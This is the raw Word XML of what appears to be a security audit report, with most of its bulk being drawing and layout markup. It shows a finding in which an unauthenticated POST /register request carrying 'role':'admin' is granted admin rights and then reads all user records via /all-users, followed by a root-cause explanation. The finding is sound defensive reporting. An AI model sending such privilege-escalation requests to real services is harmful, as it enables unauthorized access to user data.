                <v:shape id="Shape 348" o:spid="_x0000_s1050" style="position:absolute;width:64801;height:10668;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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4sjxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BasJA&#10;EIbvgu+wjNCbbtRWSuoqIkj10INaaI/D7jRJm50N2Y2Jb985FHoc/vm/+Wa9HXytbtTGKrCB+SwD&#10;RWyDq7gw8H49TJ9BxYTssA5MBu4UYbsZj9aYu9DzmW6XVCiBcMzRQJlSk2sdbUke4yw0xJJ9hdZj&#10;krEttGuxF7iv9SLLVtpjxXKhxIb2JdmfS+dF4/tt+bE4WTuc769d/dkV6J56Yx4mw+4FVKIh/S//&#10;tY/OwPJRbOUZIYDe/AIAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDmv4sjxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m19050,l6467474,v2527,,4956,484,7290,1448l6480126,5034r,1056735l6474764,1065349v-2334,967,-4763,1451,-7290,1451l19050,1066800v-2526,,-4956,-484,-7290,-1451c9426,1064382,7366,1063005,5580,1061222v-1787,-1789,-3163,-3848,-4130,-6182l,1047750,,19050,1450,11757c2417,9426,3793,7367,5580,5581,7366,3792,9426,2415,11760,1448,14094,484,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,1066800"/>
                </v:shape>
                <v:rect id="Rectangle 429" o:spid="_x0000_s1051" style="position:absolute;left:1007;top:1550;width:3694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20EAF43B" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>POST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 xml:space="preserve">/register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no Authorization header)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25440" o:spid="_x0000_s1052" style="position:absolute;left:1007;top:3264;width:72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LuxwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasJA&#10;FIX3Bd9huEJ3daLYYqKjiFri0iYF6+6SuU1CM3dCZpqkfXpnUejycP74NrvRNKKnztWWFcxnEQji&#10;wuqaSwXv+evTCoTzyBoby6TghxzstpOHDSbaDvxGfeZLEUbYJaig8r5NpHRFRQbdzLbEwfu0nUEf&#10;ZFdK3eEQxk0jF1H0Ig3WHB4qbOlQUfGVfRsF6ardf5zt71A2p1t6vVzjYx57pR6n434NwtPo/8N/&#10;7bNWsHheLgNAwAkoILd3AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKDG4u7HAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="021ECFA9"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25444" o:spid="_x0000_s1053" style="position:absolute;left:1552;top:3264;width:4853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TtxwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvulFS0TQbEW3RY9WC7e2RfU2C2bchuzWpv94tCD0OM/MNk656U4srta6yrGA6iUAQ&#10;51ZXXCj4OL2NFyCcR9ZYWyYFv+RglQ0HKSbadnyg69EXIkDYJaig9L5JpHR5SQbdxDbEwfu2rUEf&#10;ZFtI3WIX4KaWsyiaS4MVh4USG9qUlF+OP0bBbtGsP/f21hX169fu/H5ebk9Lr9TTqF+/gPDU+//w&#10;o73XCmbPcRzD351wBWR2BwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAN/95O3HAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="7810E43C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>"</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>username":"attacker</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>_...","</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>password":"password","role":"admin</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>", ...</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25443" o:spid="_x0000_s1054" style="position:absolute;left:38042;top:3264;width:72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HyZ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qZP8/kM/u6EKyA3vwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBQFHyZyAAAAN4A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="0BFC824A"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431" o:spid="_x0000_s1055" style="position:absolute;left:1007;top:6693;width:2535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4F026311" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>→ 201 Created, role granted = admin</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 432" o:spid="_x0000_s1056" style="position:absolute;left:1007;top:8408;width:5143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61C03420" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>→ GET /all-users with the returned token → 200, 5 user records returned</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 433" o:spid="_x0000_s1057" style="position:absolute;top:12089;width:894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01412CAF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t>Root cause.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 434" o:spid="_x0000_s1058" style="position:absolute;left:6727;top:12089;width:7373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2AEC01B6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> Two independent mistakes compounding. The route was never placed in a protected group — plausibly a</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 435" o:spid="_x0000_s1059" style="position:absolute;top:13804;width:18045;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96ED6F3" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">scaffolding leftover, since </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 436" o:spid="_x0000_s1060" style="position:absolute;left:13525;top:13620;width:4096;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4095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CPwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvwn6H8Ba8yJpYpSzVKLtCYU+Cfw4eH82zLTYvpYm2fnuzIHgcZuY3zGoz2EbcqfO1Yw2zqQJB&#10;XDhTc6nhdMy/vkH4gGywcUwaHuRhs/4YrTAzruc93Q+hFBHCPkMNVQhtJqUvKrLop64ljt7FdRZD&#10;lF0pTYd9hNtGJkql0mLNcaHClrYVFdfDzWrYtUElk+Siek635/x3j498glqPP4efJYhAQ3iHX+0/&#10;o2ExT+H/TDwCcv0EAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEALaOgj8MAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l400050,v2630,,4875,930,6735,2791c408645,4648,409575,6893,409575,9525r,123825c409575,135979,408645,138224,406785,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6893,930,4648,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,409575,142875"/>
                </v:shape>
                <v:rect id="Rectangle 437" o:spid="_x0000_s1061" style="position:absolute;left:13838;top:13857;width:465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3EF10EA7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>/</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>login</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 438" o:spid="_x0000_s1062" style="position:absolute;left:17604;top:13804;width:2184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6B804D9D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> legitimately belongs there and </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 439" o:spid="_x0000_s1063" style="position:absolute;left:34004;top:13620;width:5810;height:1429;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JYZxgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9bawIx&#10;FITfC/0P4Qh9KZr1Qqlbo6ggCH3wDj6ebo576eZkSVLd/ntTEPo4zMw3zGTWmlpcyfnSsoJ+LwFB&#10;nFldcq7geFh130H4gKyxtkwKfsnDbPr8NMFU2xvv6LoPuYgQ9ikqKEJoUil9VpBB37MNcfQu1hkM&#10;Ubpcaoe3CDe1HCTJmzRYclwosKFlQdn3/scoOOxOX6Pt5lxV4+3r3FWLzeqTpVIvnXb+ASJQG/7D&#10;j/ZaKxgNx/B3Jh4BOb0DAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAGAiWGcYAAADcAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l571500,v2630,,4875,930,6735,2791c580095,4648,581025,6893,581025,9525r,123825c581025,135979,580095,138224,578235,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6893,930,4648,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,581025,142875"/>
                </v:shape>
                <v:rect id="Rectangle 440" o:spid="_x0000_s1064" style="position:absolute;left:34301;top:13857;width:697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72A207E1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>/</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>register</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 441" o:spid="_x0000_s1065" style="position:absolute;left:39817;top:13804;width:21321;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12F2679" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> was written beside it. And the </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 442" o:spid="_x0000_s1066" style="position:absolute;left:55816;top:13620;width:2858;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="28575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XeFwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9LawIx&#10;FIX3hf6HcAvd1UxFpEyNIgW1Llz4oOvL5JoZnNwMSUajv94IQpeH8/g4k1myrTiTD41jBZ+DAgRx&#10;5XTDRsFhv/j4AhEissbWMSm4UoDZ9PVlgqV2F97SeReNyCMcSlRQx9iVUoaqJoth4Dri7B2dtxiz&#10;9EZqj5c8bls5LIqxtNhwJtTY0U9N1WnX2wzpeul7k9I6bZbm77a0p+vKKvX+lubfICKl+B9+tn+1&#10;gtFoCI8z+QjI6R0AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQC1bXeFwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9526,l276226,v2630,,4874,930,6734,2791c284820,4648,285750,6893,285751,9525r,123825c285750,135979,284820,138224,282960,140084v-1860,1861,-4104,2791,-6734,2791l9526,142875v-2631,,-4876,-930,-6736,-2791c930,138224,,135979,1,133350l1,9525c,6893,930,4648,2790,2791,4650,930,6895,,9526,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285751,142875"/>
                </v:shape>
                <v:rect id="Rectangle 443" o:spid="_x0000_s1067" style="position:absolute;left:56118;top:13857;width:31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3012877" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>role</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 444" o:spid="_x0000_s1068" style="position:absolute;left:58720;top:13804;width:657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7362CAE7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> field was</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="415DF1FE" w14:textId="71587C09" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00E868FD">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0768" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="27684321" wp14:editId="0FC386B8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>510540</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>448310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2247900" cy="571500"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28829" name="Group 28829"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2247900" cy="571500"/>
                          <a:chOff x="495300" y="0"/>
                          <a:chExt cx="2247900" cy="571500"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="530" name="Shape 530"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1504950" y="0"/>
                            <a:ext cx="752475" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745580" y="0"/>
                                  <a:pt x="747825" y="930"/>
                                  <a:pt x="749685" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751545" y="4648"/>
                                  <a:pt x="752475" y="6893"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="126454"/>
                                  <a:pt x="751545" y="128699"/>
                                  <a:pt x="749685" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747825" y="132417"/>
                                  <a:pt x="745580" y="133350"/>
                                  <a:pt x="742950" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>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33" name="Shape 533"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2400300" y="0"/>
                            <a:ext cx="342900" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338250" y="930"/>
                                  <a:pt x="340110" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4648"/>
                                  <a:pt x="342900" y="6893"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342900" y="126454"/>
                                  <a:pt x="341970" y="128699"/>
                                  <a:pt x="340110" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338250" y="132417"/>
                                  <a:pt x="336005" y="133350"/>
                                  <a:pt x="333375" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>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39" name="Shape 539"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="495300" y="438150"/>
                            <a:ext cx="866775" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="866775" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="857250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="859880" y="0"/>
                                  <a:pt x="862125" y="930"/>
                                  <a:pt x="863985" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="865845" y="4648"/>
                                  <a:pt x="866775" y="6896"/>
                                  <a:pt x="866775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="866775" y="126454"/>
                                  <a:pt x="865845" y="128699"/>
                                  <a:pt x="863985" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="862125" y="132417"/>
                                  <a:pt x="859880" y="133347"/>
                                  <a:pt x="857250" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130559"/>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7A37CFA" id="Group 28829" o:spid="_x0000_s1026" style="position:absolute;margin-left:40.2pt;margin-top:35.3pt;width:177pt;height:45pt;z-index:-251635712;mso-width-relative:margin;mso-height-relative:margin" coordorigin="4953" 